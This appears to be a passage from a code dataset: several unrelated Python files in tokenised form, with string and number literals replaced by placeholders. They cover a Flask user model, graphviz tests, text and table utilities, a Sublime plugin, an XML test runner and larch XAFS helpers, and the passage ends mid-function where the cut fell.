<s> from hashlib import md5 <EOL> from . . extensions import db <EOL> from flask . ext . login import UserMixin <EOL> class User ( db . Model , UserMixin ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> username = db . Column ( db . String ( <NUM_LIT:200> ) , unique = True ) <EOL> password = db . Column ( db . String ( <NUM_LIT:200> ) , default = '<STR_LIT>' ) <EOL> name = db . Column ( db . String ( <NUM_LIT:100> ) ) <EOL> email = db . Column ( db . String ( <NUM_LIT:200> ) ) <EOL> active = db . Column ( db . Boolean , default = True ) <EOL> ui_lang = db . Column ( db . String ( <NUM_LIT:2> ) , default = '<STR_LIT>' ) <EOL> url = db . Column ( db . String ( <NUM_LIT:200> ) ) <EOL> def gavatar ( self , size = <NUM_LIT> ) : <EOL> if self . email : <EOL> return '<STR_LIT>' . format ( <EOL> hashd = md5 ( self . email ) . hexdigest ( ) , size = str ( size ) ) <EOL> else : <EOL> return None <EOL> def is_active ( self ) : <EOL> return self . active <EOL> def get_access_token ( self , provider , param_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> s = self . social_auth . filter_by ( provider = provider ) . one ( ) <EOL> return s . extra_data . get ( param_name , None ) </s>
<s> from __future__ import print_function <EOL> from builtins import object <EOL> import re <EOL> import difflib <EOL> COLUMN_NAMES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:name>' , <EOL> '<STR_LIT:type>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> class Pin ( object ) : <EOL> pass <EOL> DEFAULT_PIN = Pin ( ) <EOL> DEFAULT_PIN . num = None <EOL> DEFAULT_PIN . name = '<STR_LIT>' <EOL> DEFAULT_PIN . type = '<STR_LIT>' <EOL> DEFAULT_PIN . style = '<STR_LIT>' <EOL> DEFAULT_PIN . unit = <NUM_LIT:1> <EOL> DEFAULT_PIN . side = '<STR_LIT:left>' <EOL> def num_row_elements ( row ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> rowset = set ( row ) <EOL> rowset . discard ( '<STR_LIT>' ) <EOL> return len ( rowset ) <EOL> except TypeError : <EOL> return <NUM_LIT:0> <EOL> def get_nonblank_row ( csv_reader ) : <EOL> '''<STR_LIT>''' <EOL> for row in csv_reader : <EOL> if num_row_elements ( row ) > <NUM_LIT:0> : <EOL> return row <EOL> return None <EOL> def get_part_num ( csv_reader ) : <EOL> '''<STR_LIT>''' <EOL> part_num = get_nonblank_row ( csv_reader ) <EOL> try : <EOL> part_num = set ( part_num ) <EOL> part_num . discard ( '<STR_LIT>' ) <EOL> return part_num . pop ( ) <EOL> except TypeError : <EOL> return None <EOL> def find_closest_match ( name , name_dict , fuzzy_match , threshold = <NUM_LIT:0.0> ) : <EOL> '''<STR_LIT>''' <EOL> scrubber = re . compile ( '<STR_LIT>' ) <EOL> name = scrubber . sub ( '<STR_LIT>' , name ) . lower ( ) <EOL> if fuzzy_match == False : <EOL> return name_dict [ name ] <EOL> match = difflib . get_close_matches ( name , list ( name_dict . 
keys ( ) ) , <NUM_LIT:1> , threshold ) [ <NUM_LIT:0> ] <EOL> return name_dict [ match ] <EOL> def clean_headers ( headers ) : <EOL> '''<STR_LIT>''' <EOL> return [ find_closest_match ( h , COLUMN_NAMES , True ) for h in headers ] <EOL> def issue ( msg , level = '<STR_LIT>' ) : <EOL> if level == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' . format ( msg ) ) <EOL> elif level == '<STR_LIT:error>' : <EOL> print ( '<STR_LIT>' . format ( msg ) ) <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> print ( msg ) <EOL> def fix_pin_data ( pin_data , part_num ) : <EOL> '''<STR_LIT>''' <EOL> fixed_pin_data = pin_data . strip ( ) <EOL> if re . search ( '<STR_LIT>' , fixed_pin_data ) is not None : <EOL> fixed_pin_data = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , fixed_pin_data ) <EOL> issue ( "<STR_LIT>" . format ( ** locals ( ) ) ) <EOL> return fixed_pin_data </s>
<s> import os <EOL> import unittest2 as unittest <EOL> from graphviz . files import File , Source <EOL> class TestBase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . file = File ( ) <EOL> def test_format ( self ) : <EOL> with self . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> self . file . format = '<STR_LIT>' <EOL> def test_engine ( self ) : <EOL> with self . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> self . file . engine = '<STR_LIT>' <EOL> def test_encoding ( self ) : <EOL> with self . assertRaisesRegexp ( LookupError , '<STR_LIT>' ) : <EOL> self . file . encoding = '<STR_LIT>' <EOL> class TestFile ( unittest . TestCase ) : <EOL> def test_init ( self ) : <EOL> f = File ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( f . filename , '<STR_LIT:name>' ) <EOL> self . assertEqual ( f . format , '<STR_LIT>' ) <EOL> self . assertEqual ( f . engine , '<STR_LIT>' ) <EOL> self . assertEqual ( f . encoding , '<STR_LIT>' ) <EOL> class TestNoent ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _oldpath = os . environ . get ( '<STR_LIT>' ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . file = File ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . file . source = '<STR_LIT>' <EOL> def tearDown ( self ) : <EOL> if self . _oldpath is None : <EOL> del os . environ [ '<STR_LIT>' ] <EOL> else : <EOL> os . environ [ '<STR_LIT>' ] = self . _oldpath <EOL> def test_pipe ( self ) : <EOL> with self . assertRaisesRegexp ( RuntimeError , '<STR_LIT>' ) : <EOL> self . file . pipe ( ) <EOL> def test_render ( self ) : <EOL> with self . assertRaisesRegexp ( RuntimeError , '<STR_LIT>' ) : <EOL> self . file . render ( ) <EOL> class TestSource ( unittest . TestCase ) : <EOL> def test_init ( self ) : <EOL> source = '<STR_LIT>' <EOL> s = Source ( source ) <EOL> self . assertEqual ( s . source , source ) </s>
<s> __version__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> __date__ = "<STR_LIT>" <EOL> """<STR_LIT>""" <EOL> from cookbook import HTML2PDF <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> xhtml = open ( '<STR_LIT>' ) <EOL> HTML2PDF ( xhtml . read ( ) , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import string <EOL> from goose . utils import FileHelper <EOL> from goose . utils . encoding import smart_unicode <EOL> from goose . utils . encoding import smart_str <EOL> from goose . utils . encoding import DjangoUnicodeDecodeError <EOL> TABSSPACE = re . compile ( r'<STR_LIT>' ) <EOL> def innerTrim ( value ) : <EOL> if isinstance ( value , ( unicode , str ) ) : <EOL> value = re . sub ( TABSSPACE , '<STR_LIT:U+0020>' , value ) <EOL> value = '<STR_LIT>' . join ( value . splitlines ( ) ) <EOL> return value . strip ( ) <EOL> return '<STR_LIT>' <EOL> def encodeValue ( value ) : <EOL> string_org = value <EOL> try : <EOL> value = smart_unicode ( value ) <EOL> except ( UnicodeEncodeError , DjangoUnicodeDecodeError ) : <EOL> value = smart_str ( value ) <EOL> except : <EOL> value = string_org <EOL> return value <EOL> class WordStats ( object ) : <EOL> def __init__ ( self ) : <EOL> self . stop_word_count = <NUM_LIT:0> <EOL> self . word_count = <NUM_LIT:0> <EOL> self . stop_words = [ ] <EOL> def get_stop_words ( self ) : <EOL> return self . stop_words <EOL> def set_stop_words ( self , words ) : <EOL> self . stop_words = words <EOL> def get_stopword_count ( self ) : <EOL> return self . stop_word_count <EOL> def set_stopword_count ( self , wordcount ) : <EOL> self . stop_word_count = wordcount <EOL> def get_word_count ( self ) : <EOL> return self . word_count <EOL> def set_word_count ( self , cnt ) : <EOL> self . word_count = cnt <EOL> class StopWords ( object ) : <EOL> PUNCTUATION = re . compile ( "<STR_LIT>" ) <EOL> TRANS_TABLE = string . maketrans ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _cached_stop_words = { } <EOL> def __init__ ( self , language = '<STR_LIT>' ) : <EOL> if not language in self . _cached_stop_words : <EOL> path = os . path . join ( '<STR_LIT:text>' , '<STR_LIT>' % language ) <EOL> self . _cached_stop_words [ language ] = set ( FileHelper . loadResourceFile ( path ) . splitlines ( ) ) <EOL> self . 
STOP_WORDS = self . _cached_stop_words [ language ] <EOL> def remove_punctuation ( self , content ) : <EOL> if isinstance ( content , unicode ) : <EOL> content = content . encode ( '<STR_LIT:utf-8>' ) <EOL> return content . translate ( self . TRANS_TABLE , string . punctuation ) . decode ( '<STR_LIT:utf-8>' ) <EOL> def candiate_words ( self , stripped_input ) : <EOL> return stripped_input . split ( '<STR_LIT:U+0020>' ) <EOL> def get_stopword_count ( self , content ) : <EOL> if not content : <EOL> return WordStats ( ) <EOL> ws = WordStats ( ) <EOL> stripped_input = self . remove_punctuation ( content ) <EOL> candiate_words = self . candiate_words ( stripped_input ) <EOL> overlapping_stopwords = [ ] <EOL> c = <NUM_LIT:0> <EOL> for w in candiate_words : <EOL> c += <NUM_LIT:1> <EOL> if w . lower ( ) in self . STOP_WORDS : <EOL> overlapping_stopwords . append ( w . lower ( ) ) <EOL> ws . set_word_count ( c ) <EOL> ws . set_stopword_count ( len ( overlapping_stopwords ) ) <EOL> ws . set_stop_words ( overlapping_stopwords ) <EOL> return ws <EOL> class StopWordsChinese ( StopWords ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , language = '<STR_LIT>' ) : <EOL> super ( StopWordsChinese , self ) . __init__ ( language = '<STR_LIT>' ) <EOL> def candiate_words ( self , stripped_input ) : <EOL> import jieba <EOL> return jieba . cut ( stripped_input , cut_all = True ) <EOL> class StopWordsArabic ( StopWords ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , language = '<STR_LIT>' ) : <EOL> super ( StopWordsArabic , self ) . __init__ ( language = '<STR_LIT>' ) <EOL> def remove_punctuation ( self , content ) : <EOL> return content <EOL> def candiate_words ( self , stripped_input ) : <EOL> import nltk <EOL> s = nltk . stem . isri . ISRIStemmer ( ) <EOL> words = [ ] <EOL> for word in nltk . tokenize . wordpunct_tokenize ( stripped_input ) : <EOL> words . append ( s . stem ( word ) ) <EOL> return words </s>
<s> import sublime , sublime_plugin <EOL> from . gist . lib import util <EOL> class HaoGistEvent ( sublime_plugin . EventListener ) : <EOL> def on_post_save_async ( self , view ) : <EOL> settings = util . get_settings ( ) ; <EOL> if settings [ "<STR_LIT>" ] not in view . file_name ( ) : return <EOL> if settings . get ( '<STR_LIT>' ) : <EOL> view . run_command ( '<STR_LIT>' ) </s>
<s> import sys <EOL> import time <EOL> from . unittest import TextTestRunner <EOL> from . result import _XMLTestResult <EOL> UTF8 = '<STR_LIT>' <EOL> class XMLTestRunner ( TextTestRunner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , output = '<STR_LIT:.>' , outsuffix = None , stream = sys . stderr , <EOL> descriptions = True , verbosity = <NUM_LIT:1> , elapsed_times = True , <EOL> failfast = False , buffer = False , encoding = UTF8 , <EOL> resultclass = None ) : <EOL> TextTestRunner . __init__ ( self , stream , descriptions , verbosity , <EOL> failfast = failfast , buffer = buffer ) <EOL> self . verbosity = verbosity <EOL> self . output = output <EOL> self . encoding = encoding <EOL> if outsuffix is None : <EOL> outsuffix = time . strftime ( "<STR_LIT>" ) <EOL> self . outsuffix = outsuffix <EOL> self . elapsed_times = elapsed_times <EOL> if resultclass is None : <EOL> self . resultclass = _XMLTestResult <EOL> else : <EOL> self . resultclass = resultclass <EOL> def _make_result ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . resultclass ( <EOL> self . stream , self . descriptions , self . verbosity , self . elapsed_times <EOL> ) <EOL> def run ( self , test ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> result = self . _make_result ( ) <EOL> result . failfast = self . failfast <EOL> if hasattr ( test , '<STR_LIT>' ) : <EOL> result . properties = test . properties <EOL> self . stream . writeln ( ) <EOL> self . stream . writeln ( '<STR_LIT>' ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> start_time = time . time ( ) <EOL> test ( result ) <EOL> stop_time = time . time ( ) <EOL> time_taken = stop_time - start_time <EOL> result . printErrors ( ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> run = result . testsRun <EOL> self . stream . writeln ( "<STR_LIT>" % ( <EOL> run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , time_taken ) <EOL> ) <EOL> self . stream . writeln ( ) <EOL> expectedFails = len ( result . 
expectedFailures ) <EOL> unexpectedSuccesses = len ( result . unexpectedSuccesses ) <EOL> skipped = len ( result . skipped ) <EOL> infos = [ ] <EOL> if not result . wasSuccessful ( ) : <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> failed , errored = map ( len , ( result . failures , result . errors ) ) <EOL> if failed : <EOL> infos . append ( "<STR_LIT>" . format ( failed ) ) <EOL> if errored : <EOL> infos . append ( "<STR_LIT>" . format ( errored ) ) <EOL> else : <EOL> self . stream . write ( "<STR_LIT:OK>" ) <EOL> if skipped : <EOL> infos . append ( "<STR_LIT>" . format ( skipped ) ) <EOL> if expectedFails : <EOL> infos . append ( "<STR_LIT>" . format ( expectedFails ) ) <EOL> if unexpectedSuccesses : <EOL> infos . append ( "<STR_LIT>" . format ( <EOL> unexpectedSuccesses ) ) <EOL> if infos : <EOL> self . stream . writeln ( "<STR_LIT>" . format ( "<STR_LIT:U+002CU+0020>" . join ( infos ) ) ) <EOL> else : <EOL> self . stream . write ( "<STR_LIT:\n>" ) <EOL> self . stream . writeln ( ) <EOL> self . stream . writeln ( '<STR_LIT>' ) <EOL> result . generate_reports ( self ) <EOL> finally : <EOL> pass <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import re <EOL> from humanfriendly . compat import coerce_string <EOL> from humanfriendly . terminal import ( <EOL> ansi_strip , <EOL> ansi_width , <EOL> ansi_wrap , <EOL> terminal_supports_colors , <EOL> find_terminal_size , <EOL> HIGHLIGHT_COLOR , <EOL> ) <EOL> __all__ = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> NUMERIC_DATA_PATTERN = re . compile ( r'<STR_LIT>' ) <EOL> def format_smart_table ( data , column_names ) : <EOL> """<STR_LIT>""" <EOL> data = [ normalize_columns ( r ) for r in data ] <EOL> column_names = normalize_columns ( column_names ) <EOL> if not any ( any ( '<STR_LIT:\n>' in c for c in r ) for r in data ) : <EOL> pretty_table = format_pretty_table ( data , column_names ) <EOL> table_width = max ( map ( ansi_width , pretty_table . splitlines ( ) ) ) <EOL> num_rows , num_columns = find_terminal_size ( ) <EOL> if table_width <= num_columns : <EOL> return pretty_table <EOL> return format_robust_table ( data , column_names ) <EOL> def format_pretty_table ( data , column_names = None , horizontal_bar = '<STR_LIT:->' , vertical_bar = '<STR_LIT:|>' ) : <EOL> """<STR_LIT>""" <EOL> data = [ normalize_columns ( r ) for r in data ] <EOL> if column_names is not None : <EOL> column_names = normalize_columns ( column_names ) <EOL> if column_names : <EOL> if terminal_supports_colors ( ) : <EOL> column_names = [ highlight_column_name ( n ) for n in column_names ] <EOL> data . insert ( <NUM_LIT:0> , column_names ) <EOL> widths = collections . defaultdict ( int ) <EOL> numeric_data = collections . defaultdict ( list ) <EOL> for row_index , row in enumerate ( data ) : <EOL> for column_index , column in enumerate ( row ) : <EOL> widths [ column_index ] = max ( widths [ column_index ] , ansi_width ( column ) ) <EOL> if not ( column_names and row_index == <NUM_LIT:0> ) : <EOL> numeric_data [ column_index ] . append ( bool ( NUMERIC_DATA_PATTERN . 
match ( ansi_strip ( column ) ) ) ) <EOL> line_delimiter = horizontal_bar * ( sum ( widths . values ( ) ) + len ( widths ) * <NUM_LIT:3> + <NUM_LIT:1> ) <EOL> lines = [ line_delimiter ] <EOL> for row_index , row in enumerate ( data ) : <EOL> line = [ vertical_bar ] <EOL> for column_index , column in enumerate ( row ) : <EOL> padding = '<STR_LIT:U+0020>' * ( widths [ column_index ] - ansi_width ( column ) ) <EOL> if all ( numeric_data [ column_index ] ) : <EOL> line . append ( '<STR_LIT:U+0020>' + padding + column + '<STR_LIT:U+0020>' ) <EOL> else : <EOL> line . append ( '<STR_LIT:U+0020>' + column + padding + '<STR_LIT:U+0020>' ) <EOL> line . append ( vertical_bar ) <EOL> lines . append ( u'<STR_LIT>' . join ( line ) ) <EOL> if column_names and row_index == <NUM_LIT:0> : <EOL> lines . append ( line_delimiter ) <EOL> lines . append ( line_delimiter ) <EOL> return u'<STR_LIT:\n>' . join ( lines ) <EOL> def format_robust_table ( data , column_names ) : <EOL> """<STR_LIT>""" <EOL> blocks = [ ] <EOL> column_names = [ "<STR_LIT>" % n for n in normalize_columns ( column_names ) ] <EOL> if terminal_supports_colors ( ) : <EOL> column_names = [ highlight_column_name ( n ) for n in column_names ] <EOL> for row in data : <EOL> lines = [ ] <EOL> for column_index , column_text in enumerate ( normalize_columns ( row ) ) : <EOL> stripped_column = column_text . strip ( ) <EOL> if '<STR_LIT:\n>' not in stripped_column : <EOL> lines . append ( "<STR_LIT>" % ( column_names [ column_index ] , stripped_column ) ) <EOL> else : <EOL> lines . append ( column_names [ column_index ] ) <EOL> lines . extend ( column_text . rstrip ( ) . splitlines ( ) ) <EOL> blocks . append ( lines ) <EOL> num_rows , num_columns = find_terminal_size ( ) <EOL> longest_line = max ( max ( map ( ansi_width , lines ) ) for lines in blocks ) <EOL> delimiter = u"<STR_LIT>" % ( '<STR_LIT:->' * min ( longest_line , num_columns ) ) <EOL> blocks . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> blocks . 
append ( "<STR_LIT>" ) <EOL> return delimiter . join ( u"<STR_LIT:\n>" . join ( b ) for b in blocks ) . strip ( ) <EOL> def normalize_columns ( row ) : <EOL> return [ coerce_string ( c ) for c in row ] <EOL> def highlight_column_name ( name ) : <EOL> return ansi_wrap ( name , bold = True , color = HIGHLIGHT_COLOR ) </s>
<s> from larch import Interpreter <EOL> from larch_plugins . xafs import pre_edge , autobk <EOL> from larch_plugins . io import read_ascii <EOL> _larch = Interpreter ( with_plugins = False ) <EOL> fname = '<STR_LIT>' <EOL> cu = read_ascii ( fname , labels = '<STR_LIT>' , _larch = _larch ) <EOL> print '<STR_LIT>' , cu <EOL> print dir ( cu ) <EOL> pre_edge ( cu , _larch = _larch ) <EOL> print '<STR_LIT>' <EOL> print dir ( cu ) <EOL> autobk ( cu , rbkg = <NUM_LIT:1.0> , kweight = <NUM_LIT:1> , _larch = _larch ) <EOL> print '<STR_LIT>' <EOL> print dir ( cu ) </s>
<s> """<STR_LIT>""" <EOL> import larch <EOL> from larch import isParameter , Parameter , isgroup , Group <EOL> import numpy as np <EOL> def encode4js ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , np . ndarray ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : obj . shape , <EOL> '<STR_LIT>' : obj . dtype . name } <EOL> out [ '<STR_LIT:value>' ] = obj . flatten ( ) . tolist ( ) <EOL> if '<STR_LIT>' in obj . dtype . name : <EOL> out [ '<STR_LIT:value>' ] = [ ( obj . real ) . tolist ( ) , ( obj . imag ) . tolist ( ) ] <EOL> return out <EOL> elif isinstance ( obj , ( np . float , np . int ) ) : <EOL> return float ( obj ) <EOL> elif isinstance ( obj , ( np . str , np . unicode ) ) : <EOL> return str ( obj ) <EOL> elif isinstance ( obj , np . complex ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : ( obj . real , obj . imag ) } <EOL> elif isgroup ( obj ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for item in dir ( obj ) : <EOL> out [ item ] = encode4js ( getattr ( obj , item ) ) <EOL> return out <EOL> elif isParameter ( obj ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for attr in ( '<STR_LIT:value>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> val = getattr ( obj , attr , None ) <EOL> if val is not None : <EOL> out [ attr ] = val <EOL> return out <EOL> elif isinstance ( obj , ( tuple , list ) ) : <EOL> ctype = '<STR_LIT>' <EOL> if isinstance ( obj , tuple ) : <EOL> ctype = '<STR_LIT>' <EOL> val = [ encode4js ( item ) for item in obj ] <EOL> return { '<STR_LIT>' : ctype , '<STR_LIT:value>' : val } <EOL> elif isinstance ( obj , dict ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for key , val in obj . items ( ) : <EOL> out [ encode4js ( key ) ] = encode4js ( val ) <EOL> return out <EOL> return obj <EOL> def decode4js ( obj ) : <EOL> """<STR_LIT>""" <EOL> out = obj <EOL> if isinstance ( obj , dict ) : <EOL> classname = obj . 
pop ( '<STR_LIT>' , None ) <EOL> if classname is None : <EOL> return obj <EOL> elif classname == '<STR_LIT>' : <EOL> out = obj [ '<STR_LIT:value>' ] [ <NUM_LIT:0> ] + <NUM_LIT> * obj [ '<STR_LIT:value>' ] [ <NUM_LIT:1> ] <EOL> elif classname in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> out = [ ] <EOL> for item in obj [ '<STR_LIT:value>' ] : <EOL> out . append ( decode4js ( item ) ) <EOL> if classname == '<STR_LIT>' : <EOL> out = tuple ( out ) <EOL> elif classname == '<STR_LIT>' : <EOL> if obj [ '<STR_LIT>' ] . startswith ( '<STR_LIT>' ) : <EOL> re = np . fromiter ( obj [ '<STR_LIT:value>' ] [ <NUM_LIT:0> ] , dtype = '<STR_LIT>' ) <EOL> im = np . fromiter ( obj [ '<STR_LIT:value>' ] [ <NUM_LIT:1> ] , dtype = '<STR_LIT>' ) <EOL> out = re + <NUM_LIT> * im <EOL> else : <EOL> out = np . fromiter ( obj [ '<STR_LIT:value>' ] , dtype = obj [ '<STR_LIT>' ] ) <EOL> out . shape = obj [ '<STR_LIT>' ] <EOL> elif classname in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> out = { } <EOL> for key , val in obj . items ( ) : <EOL> out [ key ] = decode4js ( val ) <EOL> if classname == '<STR_LIT>' : <EOL> out = Parameter ( ** out ) <EOL> elif classname == '<STR_LIT>' : <EOL> out = Group ( ** out ) <EOL> return out </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import os <EOL> import sys <EOL> from random import seed , randrange <EOL> from string import printable <EOL> BAD_FILECHARS = '<STR_LIT>' <EOL> GOOD_FILECHARS = '<STR_LIT:_>' * len ( BAD_FILECHARS ) <EOL> MODDOC = '''<STR_LIT>''' <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:2>' : <EOL> from string import maketrans <EOL> BAD_FILETABLE = maketrans ( BAD_FILECHARS , GOOD_FILECHARS ) <EOL> def fix_filename ( s ) : <EOL> """<STR_LIT>""" <EOL> t = str ( s ) . translate ( BAD_FILETABLE ) <EOL> if t . count ( '<STR_LIT:.>' ) > <NUM_LIT:1> : <EOL> for i in range ( t . count ( '<STR_LIT:.>' ) - <NUM_LIT:1> ) : <EOL> idot = t . find ( '<STR_LIT:.>' ) <EOL> t = "<STR_LIT>" % ( t [ : idot ] , t [ idot + <NUM_LIT:1> : ] ) <EOL> return t <EOL> def fix_varname ( s ) : <EOL> """<STR_LIT>""" <EOL> t = str ( s ) . translate ( BAD_FILETABLE ) <EOL> while t . endswith ( '<STR_LIT:_>' ) : t = t [ : - <NUM_LIT:1> ] <EOL> return t <EOL> elif sys . version [ <NUM_LIT:0> ] == '<STR_LIT:3>' : <EOL> def fix_filename ( s ) : <EOL> """<STR_LIT>""" <EOL> t = s . translate ( s . maketrans ( BAD_FILECHARS , GOOD_FILECHARS ) ) <EOL> if t . count ( '<STR_LIT:.>' ) > <NUM_LIT:1> : <EOL> for i in range ( t . count ( '<STR_LIT:.>' ) - <NUM_LIT:1> ) : <EOL> idot = t . find ( '<STR_LIT:.>' ) <EOL> t = "<STR_LIT>" % ( t [ : idot ] , t [ idot + <NUM_LIT:1> : ] ) <EOL> return t <EOL> def fix_varname ( s ) : <EOL> """<STR_LIT>""" <EOL> t = s . translate ( s . maketrans ( BAD_FILECHARS , GOOD_FILECHARS ) ) <EOL> while t . endswith ( '<STR_LIT:_>' ) : t = t [ : - <NUM_LIT:1> ] <EOL> return t <EOL> def strip_quotes ( t ) : <EOL> d3 , s3 , d1 , s1 = '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT:">' , "<STR_LIT:'>" <EOL> if hasattr ( t , '<STR_LIT>' ) : <EOL> if ( ( t . startswith ( d3 ) and t . endswith ( d3 ) ) or <EOL> ( t . startswith ( s3 ) and t . endswith ( s3 ) ) ) : <EOL> t = t [ <NUM_LIT:3> : - <NUM_LIT:3> ] <EOL> elif ( ( t . startswith ( d1 ) and t . 
endswith ( d1 ) ) or <EOL> ( t . startswith ( s1 ) and t . endswith ( s1 ) ) ) : <EOL> t = t [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return t <EOL> def asciikeys ( adict ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k . encode ( '<STR_LIT:ascii>' ) , v ) for k , v in adict . items ( ) ) <EOL> def get_timestamp ( with_t = False ) : <EOL> """<STR_LIT>""" <EOL> if with_t : <EOL> time . strftime ( '<STR_LIT>' ) <EOL> return time . strftime ( '<STR_LIT>' ) <EOL> def random_string ( n ) : <EOL> """<STR_LIT>""" <EOL> seed ( time . time ( ) ) <EOL> s = [ printable [ randrange ( <NUM_LIT:0> , <NUM_LIT> ) ] for i in range ( n - <NUM_LIT:1> ) ] <EOL> s . insert ( <NUM_LIT:0> , printable [ randrange ( <NUM_LIT:10> , <NUM_LIT> ) ] ) <EOL> return '<STR_LIT>' . join ( s ) <EOL> def pathOf ( dir , base , ext , delim = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> p = os . path <EOL> return p . normpath ( p . join ( dir , "<STR_LIT>" % ( base , delim , ext ) ) ) <EOL> def unixpath ( d ) : <EOL> "<STR_LIT>" <EOL> d = d . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> if not d . endswith ( '<STR_LIT:/>' ) : d = '<STR_LIT>' % d <EOL> return d <EOL> def winpath ( d ) : <EOL> "<STR_LIT>" <EOL> if d . startswith ( '<STR_LIT>' ) : d = d [ <NUM_LIT:1> : ] <EOL> d = d . replace ( '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> if not d . endswith ( '<STR_LIT:\\>' ) : d = '<STR_LIT>' % d <EOL> return d <EOL> def nativepath ( d ) : <EOL> "<STR_LIT>" <EOL> if os . name == '<STR_LIT>' : <EOL> return winpath ( d ) <EOL> return unixpath ( d ) <EOL> def get_homedir ( ) : <EOL> """<STR_LIT>""" <EOL> homedir = '<STR_LIT:.>' <EOL> if os . name == '<STR_LIT>' : <EOL> try : <EOL> from win32com . shell import shellcon , shell <EOL> homedir = shell . SHGetFolderPath ( <NUM_LIT:0> , shellcon . CSIDL_APPDATA , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except ImportError : <EOL> homedir = os . get_environ ( '<STR_LIT>' , '<STR_LIT:.>' ) <EOL> else : <EOL> try : <EOL> os . path . 
expanduser ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> return homedir <EOL> def gformat ( val , length = <NUM_LIT:11> ) : <EOL> """<STR_LIT>""" <EOL> length = max ( length , <NUM_LIT:7> ) <EOL> fmt = '<STR_LIT>' % ( length - <NUM_LIT:6> ) <EOL> if isinstance ( val , int ) : <EOL> out = ( '<STR_LIT>' % ( length - <NUM_LIT:2> ) ) . format ( val ) <EOL> if len ( out ) > length : <EOL> out = fmt . format ( val ) <EOL> else : <EOL> out = fmt . format ( val ) <EOL> if len ( out ) < length : <EOL> if '<STR_LIT:e>' in out : <EOL> ie = out . find ( '<STR_LIT:e>' ) <EOL> if '<STR_LIT:.>' not in out [ : ie ] : <EOL> out = out [ : ie ] + '<STR_LIT:.>' + out [ ie : ] <EOL> out = out . replace ( '<STR_LIT:e>' , '<STR_LIT:0>' * ( length - len ( out ) ) + '<STR_LIT:e>' ) <EOL> else : <EOL> fmt = '<STR_LIT>' % ( length - <NUM_LIT:1> ) <EOL> out = fmt . format ( val ) [ : length ] <EOL> if len ( out ) < length : <EOL> pad = '<STR_LIT:0>' if '<STR_LIT:.>' in out else '<STR_LIT:U+0020>' <EOL> out += pad * ( length - len ( out ) ) <EOL> return out <EOL> def increment_filename ( inpfile , ndigits = <NUM_LIT:3> , delim = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> dirname , filename = os . path . split ( inpfile ) <EOL> base , ext = os . path . splitext ( filename ) <EOL> if ext == '<STR_LIT>' : <EOL> ext = '<STR_LIT>' <EOL> if ext . startswith ( '<STR_LIT:.>' ) : <EOL> ext = ext [ <NUM_LIT:1> : ] <EOL> if ndigits < <NUM_LIT:3> : <EOL> ndigits = <NUM_LIT:3> <EOL> form = "<STR_LIT>" % ( ndigits ) <EOL> def _incr ( base , ext ) : <EOL> if ext . isdigit ( ) : <EOL> ext = form % ( int ( ext ) + <NUM_LIT:1> ) <EOL> else : <EOL> found = False <EOL> if 